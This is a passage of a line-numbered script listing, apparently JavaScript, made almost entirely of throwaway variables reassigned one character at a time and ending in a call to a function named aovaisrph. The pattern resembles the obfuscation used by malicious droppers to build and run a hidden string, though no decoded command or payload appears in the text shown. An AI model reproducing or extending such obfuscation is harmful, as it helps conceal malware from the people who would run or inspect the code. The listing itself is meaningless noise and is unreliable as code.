752 | mejwmm = "C"; | |
753 | mejwmm = "M"; | |
754 | mejwmm = "W"; | |
755 | mejwmm = "e"; | |
756 | mejwmm = "e"; | |
757 | mejwmm = "6"; | |
758 | fgpvujtn = "u"; | |
759 | ffmkgcjac = "c"; | |
760 | ffmkgcjac = "U"; | |
761 | ffmkgcjac = "x"; | |
762 | ffmkgcjac = "R"; | |
763 | ffmkgcjac = "M"; | |
764 | ffmkgcjac = "I"; | |
765 | ffmkgcjac = "a"; | |
766 | ffmkgcjac = "L"; | |
767 | ffmkgcjac = "U"; | |
768 | ffmkgcjac = "n"; | |
769 | ffmkgcjac = "z"; | |
770 | ffmkgcjac = "M"; | |
771 | ffmkgcjac = "z"; | |
772 | ffmkgcjac = "Q"; | |
773 | lftjfu = "T"; | |
774 | lftjfu = "L"; | |
775 | lftjfu = "y"; | |
776 | lftjfu = "O"; | |
777 | lftjfu = "J"; | |
778 | lftjfu = "Q"; | |
779 | lftjfu = "W"; | |
780 | lftjfu = "A"; | |
781 | lftjfu = "y"; | |
782 | lftjfu = "d"; | |
783 | lftjfu = "B"; | |
784 | lftjfu = "E"; | |
785 | lftjfu = "j"; | |
786 | lftjfu = "a"; | |
787 | lftjfu = "s"; | |
788 | lftjfu = "G"; | |
789 | lftjfu = "q"; | |
790 | lftjfu = "E"; | |
791 | lftjfu = "o"; | |
792 | lftjfu = "N"; | |
793 | lftjfu = "p"; | |
794 | lftjfu = "Y"; | |
795 | lftjfu = "f"; | |
796 | lftjfu = "X"; | |
797 | lftjfu = "e"; | |
798 | lftjfu = "U"; | |
799 | lftjfu = "P"; | |
800 | lftjfu = "x"; | |
801 | lftjfu = "h"; | |
802 | lftjfu = "f"; | |
803 | lftjfu = "w"; | |
804 | lftjfu = "f"; | |
805 | tizah = "q"; | |
806 | tizah = "I"; | |
807 | tizah = "j"; | |
808 | tizah = "U"; | |
809 | tizah = "U"; | |
810 | tizah = "H"; | |
811 | tizah = "L"; | |
812 | tizah = "V"; | |
813 | tizah = "n"; | |
814 | tizah = "L"; | |
815 | tizah = "S"; | |
816 | tizah = "n"; | |
817 | tizah = "b"; | |
818 | tizah = "w"; | |
819 | tizah = "W"; | |
820 | tizah = "T"; | |
821 | tizah = "a"; | |
822 | tizah = "S"; | |
823 | tizah = "n"; | |
824 | tizah = "M"; | |
825 | tizah = "M"; | |
826 | tizah = "m"; | |
827 | tizah = "q"; | |
828 | tizah = "f"; | |
829 | tizah = "f"; | |
830 | tizah = "Q"; | |
831 | tizah = "H"; | |
832 | tizah = "X"; | |
833 | tizah = "b"; | |
834 | tizah = "X"; | |
835 | tizah = "U"; | |
836 | tizah = "y"; | |
837 | tizah = "d"; | |
838 | tizah = "\""; | |
839 | kcrxlv = "d"; | |
840 | kcrxlv = "Q"; | |
841 | kcrxlv = "s"; | |
842 | kcrxlv = "t"; | |
843 | kcrxlv = "b"; | |
844 | kcrxlv = "Y"; | |
845 | kcrxlv = "V"; | |
846 | kcrxlv = "g"; | |
847 | kcrxlv = "W"; | |
848 | kcrxlv = "K"; | |
849 | kcrxlv = "T"; | |
850 | kcrxlv = "g"; | |
851 | kcrxlv = "w"; | |
852 | kcrxlv = "B"; | |
853 | kcrxlv = "P"; | |
854 | kcrxlv = "I"; | |
855 | kcrxlv = "p"; | |
856 | kcrxlv = "p"; | |
857 | gqvtewytr = "v"; | |
858 | gqvtewytr = "U"; | |
859 | gqvtewytr = "x"; | |
860 | gqvtewytr = "m"; | |
861 | gqvtewytr = "l"; | |
862 | gqvtewytr = "S"; | |
863 | gqvtewytr = "g"; | |
864 | gqvtewytr = "s"; | |
865 | gqvtewytr = "a"; | |
866 | gqvtewytr = "B"; | |
867 | gqvtewytr = "E"; | |
868 | gqvtewytr = "Z"; | |
869 | gqvtewytr = "J"; | |
870 | gqvtewytr = "M"; | |
871 | gqvtewytr = "t"; | |
872 | gqvtewytr = "F"; | |
873 | gqvtewytr = "/"; | |
874 | jbjwigi = "q"; | |
875 | jbjwigi = "z"; | |
876 | jbjwigi = "e"; | |
877 | jbjwigi = "l"; | |
878 | jbjwigi = "u"; | |
879 | jbjwigi = "S"; | |
880 | jbjwigi = "A"; | |
881 | jbjwigi = "m"; | |
882 | jbjwigi = "H"; | |
883 | jbjwigi = "Z"; | |
884 | jbjwigi = "V"; | |
885 | jbjwigi = "f"; | |
886 | jbjwigi = "i"; | |
887 | jbjwigi = "W"; | |
888 | jbjwigi = "f"; | |
889 | jbjwigi = "S"; | |
890 | jbjwigi = "X"; | |
891 | jbjwigi = "D"; | |
892 | jbjwigi = "P"; | |
893 | jbjwigi = "q"; | |
894 | uzbctob = "J"; | |
895 | uzbctob = "F"; | |
896 | uzbctob = "w"; | |
897 | uzbctob = "h"; | |
898 | uzbctob = "H"; | |
899 | uzbctob = "k"; | |
900 | uzbctob = "t"; | |
901 | uzbctob = "z"; | |
902 | uzbctob = "n"; | |
903 | uzbctob = "h"; | |
904 | uzbctob = "D"; | |
905 | uzbctob = "e"; | |
906 | uzbctob = "r"; | |
907 | uzbctob = "O"; | |
908 | uzbctob = "v"; | |
909 | ryzrbl = "F"; | |
910 | ryzrbl = "a"; | |
911 | ryzrbl = "B"; | |
912 | ryzrbl = "Z"; | |
913 | ryzrbl = "j"; | |
914 | ryzrbl = "n"; | |
915 | ryzrbl = "K"; | |
916 | ryzrbl = "R"; | |
917 | ryzrbl = "Q"; | |
918 | ryzrbl = "U"; | |
919 | ryzrbl = "I"; | |
920 | ryzrbl = "r"; | |
921 | ryzrbl = "Y"; | |
922 | ryzrbl = "Z"; | |
923 | ryzrbl = "q"; | |
924 | ryzrbl = "h"; | |
925 | ryzrbl = "M"; | |
926 | ryzrbl = "y"; | |
927 | ryzrbl = "j"; | |
928 | ryzrbl = "i"; | |
929 | ryzrbl = "Q"; | |
930 | ryzrbl = "x"; | |
931 | ryzrbl = "U"; | |
932 | ryzrbl = "I"; | |
933 | ryzrbl = "w"; | |
934 | ryzrbl = "x"; | |
935 | ryzrbl = "H"; | |
936 | ryzrbl = "E"; | |
937 | ryzrbl = "w"; | |
938 | ryzrbl = "D"; | |
939 | ryzrbl = "E"; | |
940 | ryzrbl = "O"; | |
941 | ryzrbl = "U"; | |
942 | ryzrbl = "A"; | |
943 | ryzrbl = "E"; | |
944 | ryzrbl = "Y"; | |
945 | ryzrbl = "u"; | |
946 | ryzrbl = "2"; | |
947 | ynooscbw = "t"; | |
948 | ynooscbw = "K"; | |
949 | ynooscbw = "h"; | |
950 | ynooscbw = "G"; | |
951 | ynooscbw = "o"; | |
952 | ynooscbw = "S"; | |
953 | ynooscbw = "D"; | |
954 | ynooscbw = "H"; | |
955 | ynooscbw = "s"; | |
956 | ynooscbw = "q"; | |
957 | ynooscbw = "P"; | |
958 | tejovdeev = "u"; | |
959 | tejovdeev = "t"; | |
960 | tejovdeev = "Q"; | |
961 | tejovdeev = "u"; | |
962 | tejovdeev = "R"; | |
963 | tejovdeev = "J"; | |
964 | tejovdeev = "e"; | |
965 | tejovdeev = "i"; | |
966 | tejovdeev = "E"; | |
967 | tejovdeev = "q"; | |
968 | tejovdeev = "m"; | |
969 | tejovdeev = "A"; | |
970 | tejovdeev = "O"; | |
971 | tejovdeev = "Y"; | |
972 | tejovdeev = "U"; | |
973 | tejovdeev = "O"; | |
974 | tejovdeev = "A"; | |
975 | tejovdeev = "E"; | |
976 | tejovdeev = "c"; | |
977 | tejovdeev = "P"; | |
978 | tejovdeev = "E"; | |
979 | tejovdeev = "s"; | |
980 | ctuilfaj = "l"; | |
981 | ctuilfaj = "H"; | |
982 | gofuoiwj = "a"; | |
983 | gofuoiwj = "c"; | |
984 | gofuoiwj = "R"; | |
985 | gofuoiwj = "v"; | |
986 | gofuoiwj = "v"; | |
987 | gofuoiwj = "X"; | |
988 | gofuoiwj = "U"; | |
989 | gofuoiwj = "K"; | |
990 | gofuoiwj = "N"; | |
991 | gofuoiwj = "A"; | |
992 | gofuoiwj = "b"; | |
993 | gofuoiwj = "a"; | |
994 | gofuoiwj = "w"; | |
995 | bnlyb = "S"; | |
996 | bnlyb = "L"; | |
997 | bnlyb = "T"; | |
998 | bnlyb = "A"; | |
999 | bnlyb = "d"; | |
1000 | bnlyb = "o"; | |
1001 | bnlyb = "Y"; | |
1002 | bnlyb = "Q"; | |
1003 | bnlyb = "u"; | |
1004 | bnlyb = "O"; | |
1005 | bnlyb = "D"; | |
1006 | bnlyb = "S"; | |
1007 | bnlyb = "y"; | |
1008 | bnlyb = "L"; | |
1009 | bnlyb = "n"; | |
1010 | bnlyb = "O"; | |
1011 | bnlyb = "k"; | |
1012 | bnlyb = "A"; | |
1013 | bnlyb = "g"; | |
1014 | bnlyb = "O"; | |
1015 | bnlyb = "k"; | |
1016 | bnlyb = "T"; | |
1017 | ucdshavyq = "W"; | |
1018 | ucdshavyq = "r"; | |
1019 | ucdshavyq = "Z"; | |
1020 | ucdshavyq = "y"; | |
1021 | ucdshavyq = "w"; | |
1022 | ucdshavyq = "o"; | |
1023 | ucdshavyq = "e"; | |
1024 | ucdshavyq = "H"; | |
1025 | ucdshavyq = "Z"; | |
1026 | ucdshavyq = "s"; | |
1027 | ucdshavyq = "S"; | |
1028 | ucdshavyq = "f"; | |
1029 | ucdshavyq = "z"; | |
1030 | ucdshavyq = "W"; | |
1031 | ucdshavyq = "X"; | |
1032 | ucdshavyq = "j"; | |
1033 | ucdshavyq = "P"; | |
1034 | ucdshavyq = "F"; | |
1035 | ucdshavyq = "a"; | |
1036 | ucdshavyq = "P"; | |
1037 | ucdshavyq = "D"; | |
1038 | ucdshavyq = "h"; | |
1039 | ucdshavyq = "P"; | |
1040 | ucdshavyq = "r"; | |
1041 | ucdshavyq = "F"; | |
1042 | ucdshavyq = "f"; | |
1043 | ucdshavyq = "W"; | |
1044 | ucdshavyq = "k"; | |
1045 | ucdshavyq = "R"; | |
1046 | ucdshavyq = "K"; | |
1047 | ucdshavyq = "S"; | |
1048 | ucdshavyq = "B"; | |
1049 | ucdshavyq = "y"; | |
1050 | ucdshavyq = "c"; | |
1051 | ucdshavyq = "P"; | |
1052 | ucdshavyq = "g"; | |
1053 | yfhfvqizd = "x"; | |
1054 | yfhfvqizd = "k"; | |
1055 | yfhfvqizd = "L"; | |
1056 | yfhfvqizd = "C"; | |
1057 | yfhfvqizd = "O"; | |
1058 | yfhfvqizd = "c"; | |
1059 | yfhfvqizd = "C"; | |
1060 | yfhfvqizd = "K"; | |
1061 | yfhfvqizd = "K"; | |
1062 | yfhfvqizd = "I"; | |
1063 | yfhfvqizd = "m"; | |
1064 | yfhfvqizd = "R"; | |
1065 | yfhfvqizd = "k"; | |
1066 | yfhfvqizd = "t"; | |
1067 | yfhfvqizd = "r"; | |
1068 | yfhfvqizd = "Z"; | |
1069 | yfhfvqizd = "s"; | |
1070 | yfhfvqizd = "p"; | |
1071 | yfhfvqizd = "h"; | |
1072 | yfhfvqizd = "V"; | |
1073 | yfhfvqizd = "V"; | |
1074 | yfhfvqizd = "Q"; | |
1075 | yfhfvqizd = "&"; | |
1076 | wihqll = "P"; | |
1077 | wihqll = "Y"; | |
1078 | wihqll = "Z"; | |
1079 | wihqll = "k"; | |
1080 | wihqll = "V"; | |
1081 | wihqll = "g"; | |
1082 | wihqll = "h"; | |
1083 | wihqll = "i"; | |
1084 | wihqll = "F"; | |
1085 | wihqll = "r"; | |
1086 | wihqll = "T"; | |
1087 | wihqll = "f"; | |
1088 | wihqll = "G"; | |
1089 | wihqll = "u"; | |
1090 | wihqll = "I"; | |
1091 | wihqll = "z"; | |
1092 | wihqll = "v"; | |
1093 | wihqll = "t"; | |
1094 | wihqll = "b"; | |
1095 | wihqll = "c"; | |
1096 | wihqll = "C"; | |
1097 | wihqll = "H"; | |
1098 | wihqll = "Y"; | |
1099 | wihqll = "a"; | |
1100 | wihqll = "R"; | |
1101 | wihqll = "O"; | |
1102 | wihqll = "t"; | |
1103 | wihqll = "X"; | |
1104 | wihqll = "s"; | |
1105 | wihqll = "h"; | |
1106 | wihqll = "d"; | |
1107 | wihqll = "y"; | |
1108 | wihqll = "j"; | |
1109 | wihqll = "d"; | |
1110 | wihqll = "b"; | |
1111 | wihqll = "k"; | |
1112 | wihqll = "4"; | |
1113 | rpgovccd = "x"; | |
1114 | rpgovccd = "e"; | |
1115 | rpgovccd = "J"; | |
1116 | rpgovccd = "Y"; | |
1117 | rpgovccd = "h"; | |
1118 | rpgovccd = "U"; | |
1119 | rpgovccd = "h"; | |
1120 | rpgovccd = "z"; | |
1121 | rpgovccd = "m"; | |
1122 | rpgovccd = "S"; | |
1123 | rpgovccd = "z"; | |
1124 | rpgovccd = "O"; | |
1125 | rpgovccd = "L"; | |
1126 | rpgovccd = "E"; | |
1127 | rpgovccd = "Z"; | |
1128 | rpgovccd = "f"; | |
1129 | rpgovccd = "G"; | |
1130 | rpgovccd = "p"; | |
1131 | rpgovccd = "M"; | |
1132 | rpgovccd = "B"; | |
1133 | rpgovccd = "z"; | |
1134 | rpgovccd = "t"; | |
1135 | rpgovccd = "x"; | |
1136 | rpgovccd = "A"; | |
1137 | rpgovccd = "U"; | |
1138 | rpgovccd = "M"; | |
1139 | rpgovccd = "O"; | |
1140 | rpgovccd = "a"; | |
1141 | rpgovccd = "y"; | |
1142 | rpgovccd = "D"; | |
1143 | rpgovccd = "b"; | |
1144 | rpgovccd = "Q"; | |
1145 | rpgovccd = "m"; | |
1146 | rpgovccd = "X"; | |
1147 | rpgovccd = "V"; | |
1148 | rpgovccd = "J"; | |
1149 | rpgovccd = "G"; | |
1150 | rpgovccd = "u"; | |
1151 | rpgovccd = "q"; | |
1152 | rpgovccd = "E"; | |
1153 | rpgovccd = "8"; | |
1154 | kfjjrpxme = "i"; | |
1155 | kfjjrpxme = "V"; | |
1156 | kfjjrpxme = "O"; | |
1157 | kfjjrpxme = "Q"; | |
1158 | kfjjrpxme = "N"; | |
1159 | kfjjrpxme = "e"; | |
1160 | kfjjrpxme = "S"; | |
1161 | kfjjrpxme = "A"; | |
1162 | kfjjrpxme = "B"; | |
1163 | kfjjrpxme = "z"; | |
1164 | kfjjrpxme = "M"; | |
1165 | kfjjrpxme = "y"; | |
1166 | kfjjrpxme = "G"; | |
1167 | kfjjrpxme = "K"; | |
1168 | kfjjrpxme = "J"; | |
1169 | kfjjrpxme = "G"; | |
1170 | kfjjrpxme = "g"; | |
1171 | kfjjrpxme = "U"; | |
1172 | kfjjrpxme = "C"; | |
1173 | kfjjrpxme = "B"; | |
1174 | kfjjrpxme = "l"; | |
1175 | kfjjrpxme = "Y"; | |
1176 | kfjjrpxme = "Z"; | |
1177 | kfjjrpxme = "o"; | |
1178 | kfjjrpxme = "O"; | |
1179 | kfjjrpxme = "W"; | |
1180 | kfjjrpxme = "t"; | |
1181 | kfjjrpxme = "U"; | |
1182 | clanxtdz = "z"; | |
1183 | clanxtdz = "L"; | |
1184 | clanxtdz = "X"; | |
1185 | clanxtdz = "e"; | |
1186 | clanxtdz = "b"; | |
1187 | clanxtdz = "a"; | |
1188 | clanxtdz = "I"; | |
1189 | clanxtdz = "a"; | |
1190 | clanxtdz = "q"; | |
1191 | clanxtdz = "b"; | |
1192 | clanxtdz = "n"; | |
1193 | clanxtdz = "r"; | |
1194 | clanxtdz = "p"; | |
1195 | clanxtdz = "W"; | |
1196 | clanxtdz = "p"; | |
1197 | clanxtdz = "E"; | |
1198 | clanxtdz = "I"; | |
1199 | clanxtdz = "c"; | |
1200 | clanxtdz = "K"; | |
1201 | clanxtdz = "c"; | |
1202 | clanxtdz = "y"; | |
1203 | clanxtdz = "T"; | |
1204 | clanxtdz = "D"; | |
1205 | clanxtdz = "G"; | |
1206 | clanxtdz = "F"; | |
1207 | clanxtdz = "J"; | |
1208 | clanxtdz = "x"; | |
1209 | clanxtdz = "W"; | |
1210 | clanxtdz = "b"; | |
1211 | clanxtdz = "j"; | |
1212 | clanxtdz = "O"; | |
1213 | clanxtdz = "B"; | |
1214 | clanxtdz = "v"; | |
1215 | clanxtdz = ":"; | |
1216 | wvygzow = "u"; | |
1217 | wvygzow = "I"; | |
1218 | wvygzow = "y"; | |
1219 | wvygzow = "o"; | |
1220 | wvygzow = "D"; | |
1221 | wvygzow = "n"; | |
1222 | wvygzow = "K"; | |
1223 | wvygzow = "j"; | |
1224 | wvygzow = "T"; | |
1225 | wvygzow = "F"; | |
1226 | wvygzow = "T"; | |
1227 | wvygzow = "R"; | |
1228 | wvygzow = "a"; | |
1229 | wvygzow = "w"; | |
1230 | wvygzow = "a"; | |
1231 | wvygzow = "z"; | |
1232 | wvygzow = "k"; | |
1233 | wvygzow = "P"; | |
1234 | wvygzow = "E"; | |
1235 | wvygzow = "%"; | |
1236 | waonf = "D"; | |
1237 | waonf = "H"; | |
1238 | waonf = "d"; | |
1239 | waonf = "n"; | |
1240 | waonf = "w"; | |
1241 | waonf = "x"; | |
1242 | waonf = "m"; | |
1243 | waonf = "f"; | |
1244 | waonf = "y"; | |
1245 | waonf = "S"; | |
1246 | waonf = "F"; | |
1247 | waonf = "S"; | |
1248 | waonf = "L"; | |
1249 | waonf = "p"; | |
1250 | waonf = "V"; | |
1251 | waonf = "u"; | |
1252 | waonf = "k"; | |
1253 | waonf = "U"; | |
1254 | waonf = "."; | |
1255 | dxldd = "i"; | |
1256 | dxldd = "Z"; | |
1257 | dxldd = "S"; | |
1258 | dxldd = "n"; | |
1259 | dxldd = "p"; | |
1260 | dxldd = "G"; | |
1261 | dxldd = "g"; | |
1262 | dxldd = "I"; | |
1263 | dxldd = "k"; | |
1264 | dxldd = "c"; | |
1265 | dxldd = "n"; | |
1266 | dxldd = "q"; | |
1267 | dxldd = "j"; | |
1268 | dxldd = "p"; | |
1269 | dxldd = "C"; | |
1270 | dxldd = "C"; | |
1271 | dxldd = "S"; | |
1272 | dxldd = "K"; | |
1273 | dxldd = "M"; | |
1274 | dxldd = "d"; | |
1275 | dxldd = "L"; | |
1276 | dxldd = "g"; | |
1277 | dxldd = "k"; | |
1278 | dxldd = "z"; | |
1279 | dxldd = "e"; | |
1280 | dxldd = "h"; | |
1281 | liuzxmkoj = "o"; | |
1282 | liuzxmkoj = "n"; | |
1283 | liuzxmkoj = "o"; | |
1284 | liuzxmkoj = "U"; | |
1285 | liuzxmkoj = "c"; | |
1286 | liuzxmkoj = "k"; | |
1287 | liuzxmkoj = "t"; | |
1288 | liuzxmkoj = "o"; | |
1289 | liuzxmkoj = "z"; | |
1290 | liuzxmkoj = "P"; | |
1291 | liuzxmkoj = "n"; | |
1292 | liuzxmkoj = "i"; | |
1293 | jmlrbgq = "l"; | |
1294 | bwarcqq = "K"; | |
1295 | bwarcqq = "G"; | |
1296 | bwarcqq = "J"; | |
1297 | bwarcqq = "H"; | |
1298 | bwarcqq = "a"; | |
1299 | bwarcqq = "Q"; | |
1300 | bwarcqq = "u"; | |
1301 | bwarcqq = "R"; | |
1302 | bwarcqq = "u"; | |
1303 | bwarcqq = "y"; | |
1304 | bwarcqq = "U"; | |
1305 | bwarcqq = "H"; | |
1306 | bwarcqq = "K"; | |
1307 | wuoacc = "j"; | |
1308 | wuoacc = "L"; | |
1309 | wuoacc = "P"; | |
1310 | wuoacc = "s"; | |
1311 | wuoacc = "i"; | |
1312 | wuoacc = "X"; | |
1313 | wuoacc = "L"; | |
1314 | wuoacc = "k"; | |
1315 | wuoacc = "j"; | |
1316 | wuoacc = "u"; | |
1317 | wuoacc = "A"; | |
1318 | wuoacc = "N"; | |
1319 | wuoacc = "F"; | |
1320 | wuoacc = "G"; | |
1321 | wuoacc = "-"; | |
1322 | dmvbrdz = "A"; | |
1323 | dmvbrdz = "Y"; | |
1324 | dmvbrdz = "B"; | |
1325 | dmvbrdz = "D"; | |
1326 | dmvbrdz = "o"; | |
1327 | dmvbrdz = "O"; | |
1328 | dmvbrdz = "b"; | |
1329 | dmvbrdz = "h"; | |
1330 | dmvbrdz = "M"; | |
1331 | dmvbrdz = "u"; | |
1332 | dmvbrdz = "O"; | |
1333 | dmvbrdz = "J"; | |
1334 | dmvbrdz = "H"; | |
1335 | dmvbrdz = "c"; | |
1336 | dmvbrdz = "b"; | |
1337 | dmvbrdz = "L"; | |
1338 | dmvbrdz = "v"; | |
1339 | dmvbrdz = "n"; | |
1340 | dmvbrdz = "G"; | |
1341 | dmvbrdz = "R"; | |
1342 | dmvbrdz = "k"; | |
1343 | dmvbrdz = "g"; | |
1344 | dmvbrdz = "I"; | |
1345 | dmvbrdz = "s"; | |
1346 | dmvbrdz = "v"; | |
1347 | dmvbrdz = "f"; | |
1348 | dmvbrdz = "L"; | |
1349 | dmvbrdz = "g"; | |
1350 | dmvbrdz = "9"; | |
1351 | qqlmgrn = "H"; | |
1352 | qqlmgrn = "Z"; | |
1353 | qqlmgrn = "f"; | |
1354 | qqlmgrn = "N"; | |
1355 | qqlmgrn = "i"; | |
1356 | qqlmgrn = "k"; | |
1357 | qqlmgrn = "R"; | |
1358 | qqlmgrn = "C"; | |
1359 | qqlmgrn = "e"; | |
1360 | qqlmgrn = "P"; | |
1361 | qqlmgrn = "z"; | |
1362 | qqlmgrn = "L"; | |
1363 | qqlmgrn = "U"; | |
1364 | qqlmgrn = "1"; | |
1365 | abblikex = "q"; | |
1366 | abblikex = "F"; | |
1367 | abblikex = "c"; | |
1368 | abblikex = "R"; | |
1369 | abblikex = "v"; | |
1370 | abblikex = "u"; | |
1371 | abblikex = "B"; | |
1372 | abblikex = "G"; | |
1373 | abblikex = "H"; | |
1374 | abblikex = "Z"; | |
1375 | abblikex = "o"; | |
1376 | abblikex = "s"; | |
1377 | abblikex = "n"; | |
1378 | abblikex = "O"; | |
1379 | abblikex = "t"; | |
1380 | abblikex = "c"; | |
1381 | abblikex = "S"; | |
1382 | abblikex = "F"; | |
1383 | abblikex = "H"; | |
1384 | abblikex = "n"; | |
1385 | dotkwthv = "e"; | |
1386 | dotkwthv = "a"; | |
1387 | dotkwthv = "t"; | |
1388 | dotkwthv = "n"; | |
1389 | dotkwthv = "I"; | |
1390 | dotkwthv = "y"; | |
1391 | dotkwthv = "M"; | |
1392 | dotkwthv = "B"; | |
1393 | dotkwthv = "v"; | |
1394 | dotkwthv = "N"; | |
1395 | dotkwthv = "s"; | |
1396 | dotkwthv = "\\"; | |
1397 | aovaisrph ( ); |
|